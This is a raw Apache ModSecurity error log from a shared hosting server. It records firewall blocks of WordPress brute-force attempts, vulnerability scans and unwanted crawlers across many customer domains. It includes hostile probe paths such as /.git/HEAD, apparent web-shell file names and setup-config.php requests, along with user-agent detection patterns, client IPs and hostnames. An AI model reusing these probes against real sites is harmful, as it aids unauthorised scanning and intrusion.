[Tue May 26 17:14:38.695642 2026] [security2:error] [pid 860158:tid 860214] [remote 193.42.61.12:38134] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWHpoYFlz_JJsUnscLGCAAA7Dc"]
[Tue May 26 17:14:38.869242 2026] [autoindex:error] [pid 860158:tid 860318] [client 45.86.200.6:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/blocks/archives/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:39.045505 2026] [autoindex:error] [pid 860158:tid 860387] [client 45.86.200.6:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/css/dist/components/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:39.071096 2026] [security2:error] [pid 860158:tid 860357] [client 114.119.144.31:40695] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "whitesun.in"] [uri "/1hfq/kikuyu-mystery-revealed.html"] [unique_id "ahWHp4YFlz_JJsUnscLGNgAAAMo"], referer: http://whitesun.in/1hfq/kikuyu-mystery-revealed.html
[Tue May 26 17:14:39.297593 2026] [security2:error] [pid 860158:tid 860301] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHp4YFlz_JJsUnscLGPwAAAJI"]
[Tue May 26 17:14:39.550057 2026] [security2:error] [pid 860158:tid 860358] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHp4YFlz_JJsUnscLGTQAAAMs"]
[Tue May 26 17:14:39.649474 2026] [security2:error] [pid 860158:tid 860386] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHp4YFlz_JJsUnscLGPAAAAOc"]
[Tue May 26 17:14:39.890033 2026] [security2:error] [pid 860158:tid 860320] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHp4YFlz_JJsUnscLGUwAAAKU"]
[Tue May 26 17:14:40.190911 2026] [autoindex:error] [pid 860158:tid 860306] [client 45.86.200.6:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/blocks/pullquote/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:40.197085 2026] [security2:error] [pid 860158:tid 860161] [remote 114.119.150.140:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.stockmarketanalysis.in"] [uri "/services.php"] [unique_id "ahWHqIYFlz_JJsUnscLGYAAA4gI"], referer: https://www.stockmarketanalysis.in/bullion-tips.php
[Tue May 26 17:14:40.469574 2026] [security2:error] [pid 860158:tid 860319] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHqIYFlz_JJsUnscLGbAAAAKQ"]
[Tue May 26 17:14:40.782634 2026] [security2:error] [pid 860158:tid 860357] [client 45.86.200.6:63253] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHqIYFlz_JJsUnscLGcAAAAMo"]
[Tue May 26 17:14:41.193980 2026] [autoindex:error] [pid 860158:tid 860358] [client 45.86.200.6:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/blocks/comments-pagination-numbers/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:41.286417 2026] [security2:error] [pid 860158:tid 860354] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHqIYFlz_JJsUnscLGcwAAAMc"]
[Tue May 26 17:14:41.433143 2026] [security2:error] [pid 860158:tid 860315] [client 45.86.200.6:63253] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHqYYFlz_JJsUnscLGgwAAAKA"]
[Tue May 26 17:14:41.826598 2026] [security2:error] [pid 860158:tid 860385] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHqYYFlz_JJsUnscLGjwAAAOY"]
[Tue May 26 17:14:42.411168 2026] [security2:error] [pid 860158:tid 860319] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHqoYFlz_JJsUnscLGowAAAKQ"]
[Tue May 26 17:14:42.528667 2026] [security2:error] [pid 860158:tid 860231] [remote 195.250.23.247:35734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWHqoYFlz_JJsUnscLGogAA2Ug"]
[Tue May 26 17:14:42.643974 2026] [security2:error] [pid 860158:tid 860288] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHqoYFlz_JJsUnscLGqwAAAIU"]
[Tue May 26 17:14:42.882194 2026] [security2:error] [pid 860158:tid 860364] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHqoYFlz_JJsUnscLGtQAAANE"]
[Tue May 26 17:14:43.247374 2026] [security2:error] [pid 860158:tid 860334] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHq4YFlz_JJsUnscLGvgAAALM"]
[Tue May 26 17:14:43.708798 2026] [security2:error] [pid 860158:tid 860409] [client 45.86.200.6:63253] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHq4YFlz_JJsUnscLGzwAAAP4"]
[Tue May 26 17:14:43.901097 2026] [autoindex:error] [pid 860158:tid 860388] [client 45.86.200.6:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/blocks/details/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:43.911178 2026] [security2:error] [pid 860158:tid 860387] [client 198.190.6.236:61052] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWHq4YFlz_JJsUnscLGxQAAAOg"], referer: https://anujtradingco.com/
[Tue May 26 17:14:44.039767 2026] [security2:error] [pid 860158:tid 860386] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHq4YFlz_JJsUnscLGzgAAAOc"]
[Tue May 26 17:14:44.080634 2026] [autoindex:error] [pid 860158:tid 860410] [client 45.86.200.6:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/blocks/post-terms/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:44.447458 2026] [security2:error] [pid 860158:tid 860288] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHrIYFlz_JJsUnscLG5AAAAIU"]
[Tue May 26 17:14:44.658460 2026] [security2:error] [pid 860158:tid 860340] [client 20.29.64.60:3269] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWHrIYFlz_JJsUnscLG6wAAALk"], referer: www.google.com
[Tue May 26 17:14:44.739592 2026] [security2:error] [pid 860158:tid 860356] [client 20.29.64.60:3272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/wp-plain.php"] [unique_id "ahWHrIYFlz_JJsUnscLG7AAAAMk"], referer: www.google.com
[Tue May 26 17:14:44.764675 2026] [autoindex:error] [pid 860158:tid 860376] [client 45.86.200.6:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/js/dist/development/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:44.994633 2026] [security2:error] [pid 860158:tid 860407] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHrIYFlz_JJsUnscLG_wAAAPw"]
[Tue May 26 17:14:45.058507 2026] [security2:error] [pid 860158:tid 860298] [client 203.194.101.7:52111] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHrYYFlz_JJsUnscLHAwAAAI8"]
[Tue May 26 17:14:45.058678 2026] [security2:error] [pid 860158:tid 860298] [client 203.194.101.7:52111] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHrYYFlz_JJsUnscLHAwAAAI8"]
[Tue May 26 17:14:45.180842 2026] [autoindex:error] [pid 860158:tid 860409] [client 45.86.200.6:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/sodium_compat/namespaced/Core/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:45.196775 2026] [security2:error] [pid 860158:tid 860249] [remote 113.190.40.93:56560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.40.190.113.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWHrYYFlz_JJsUnscLHBAAA9lo"]
[Tue May 26 17:14:45.220679 2026] [security2:error] [pid 860158:tid 860411] [client 20.29.64.60:3265] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/dibogqzk.php"] [unique_id "ahWHrYYFlz_JJsUnscLHCwAAAQA"], referer: www.google.com
[Tue May 26 17:14:45.471816 2026] [security2:error] [pid 860158:tid 860391] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHrYYFlz_JJsUnscLHEQAAAOw"]
[Tue May 26 17:14:45.753500 2026] [security2:error] [pid 860158:tid 860239] [remote 46.62.185.67:51736] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.185.62.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/wp-login.php"] [unique_id "ahWHrYYFlz_JJsUnscLHFQABAVA"]
[Tue May 26 17:14:45.917276 2026] [security2:error] [pid 860158:tid 860293] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHrYYFlz_JJsUnscLHFAAAAIo"]
[Tue May 26 17:14:45.979398 2026] [security2:error] [pid 860158:tid 860321] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHrYYFlz_JJsUnscLHIgAAAKY"]
[Tue May 26 17:14:46.271060 2026] [security2:error] [pid 860158:tid 860364] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHroYFlz_JJsUnscLHKwAAANE"]
[Tue May 26 17:14:46.466391 2026] [autoindex:error] [pid 860158:tid 860303] [client 45.86.200.6:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-content/uploads/2024/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:46.979060 2026] [security2:error] [pid 860158:tid 860380] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHroYFlz_JJsUnscLHRgAAAOE"]
[Tue May 26 17:14:47.254839 2026] [security2:error] [pid 860158:tid 860378] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHr4YFlz_JJsUnscLHTwAAAN8"]
[Tue May 26 17:14:47.499740 2026] [security2:error] [pid 860158:tid 860390] [client 98.159.226.61:37081] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "www.aeromodellingconsultants.glorodavionics.com"] [uri "/.git/HEAD"] [unique_id "ahWHr4YFlz_JJsUnscLHXAAAAOs"]
[Tue May 26 17:14:47.539806 2026] [security2:error] [pid 860158:tid 860351] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHr4YFlz_JJsUnscLHWgAAAMQ"]
[Tue May 26 17:14:47.565107 2026] [security2:error] [pid 860158:tid 860341] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHr4YFlz_JJsUnscLHTAAAALo"]
[Tue May 26 17:14:47.795423 2026] [security2:error] [pid 860158:tid 860296] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHr4YFlz_JJsUnscLHZgAAAI0"]
[Tue May 26 17:14:47.995917 2026] [autoindex:error] [pid 860158:tid 860397] [client 45.86.200.6:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/blocks/site-title/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:48.234210 2026] [security2:error] [pid 860158:tid 860303] [client 45.86.200.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHsIYFlz_JJsUnscLHdgAAAJQ"]
[Tue May 26 17:14:48.958719 2026] [security2:error] [pid 860158:tid 860339] [client 74.7.175.131:39198] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.fonefix.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWHsIYFlz_JJsUnscLHhwAAuHU"]
[Tue May 26 17:14:48.966276 2026] [security2:error] [pid 860158:tid 860328] [client 74.7.244.62:60460] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.fonefix.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWHsIYFlz_JJsUnscLHiAAArXc"]
[Tue May 26 17:14:49.845537 2026] [security2:error] [pid 860158:tid 860375] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHsYYFlz_JJsUnscLHlgAAANw"]
[Tue May 26 17:14:50.353845 2026] [security2:error] [pid 860158:tid 860338] [client 45.86.200.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHsoYFlz_JJsUnscLHtgAAALc"]
[Tue May 26 17:14:51.014236 2026] [security2:error] [pid 860158:tid 860387] [client 45.86.200.21:33665] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHsoYFlz_JJsUnscLHyAAAAOg"]
[Tue May 26 17:14:51.438964 2026] [security2:error] [pid 860158:tid 860317] [client 45.86.200.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHs4YFlz_JJsUnscLH2QAAAKI"]
[Tue May 26 17:14:51.817208 2026] [security2:error] [pid 860158:tid 860354] [client 167.71.246.78:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahWHs4YFlz_JJsUnscLH6AAAAMc"]
[Tue May 26 17:14:51.838181 2026] [security2:error] [pid 860158:tid 860352] [client 45.86.200.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHs4YFlz_JJsUnscLH6wAAAMU"]
[Tue May 26 17:14:52.071819 2026] [autoindex:error] [pid 860158:tid 860326] [client 45.86.200.21:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:52.340592 2026] [security2:error] [pid 860158:tid 860384] [client 45.86.200.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHtIYFlz_JJsUnscLH_wAAAOU"]
[Tue May 26 17:14:52.495797 2026] [security2:error] [pid 860158:tid 860340] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHtIYFlz_JJsUnscLH-QAAALk"]
[Tue May 26 17:14:52.562632 2026] [security2:error] [pid 860158:tid 860299] [client 54.205.63.235:53271] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "khatucity.com"] [uri "/wp-admin/setup-config.php"] [unique_id "ahWHtIYFlz_JJsUnscLIBgAAAJA"]
[Tue May 26 17:14:52.659017 2026] [security2:error] [pid 860158:tid 860348] [client 54.205.63.235:55562] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "khatucity.com"] [uri "/wordpress/wp-admin/setup-config.php"] [unique_id "ahWHtIYFlz_JJsUnscLICwAAAME"]
[Tue May 26 17:14:52.659400 2026] [security2:error] [pid 860158:tid 860339] [client 54.205.63.235:55563] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "khatucity.com"] [uri "/old/wp-admin/setup-config.php"] [unique_id "ahWHtIYFlz_JJsUnscLIDAAAALg"]
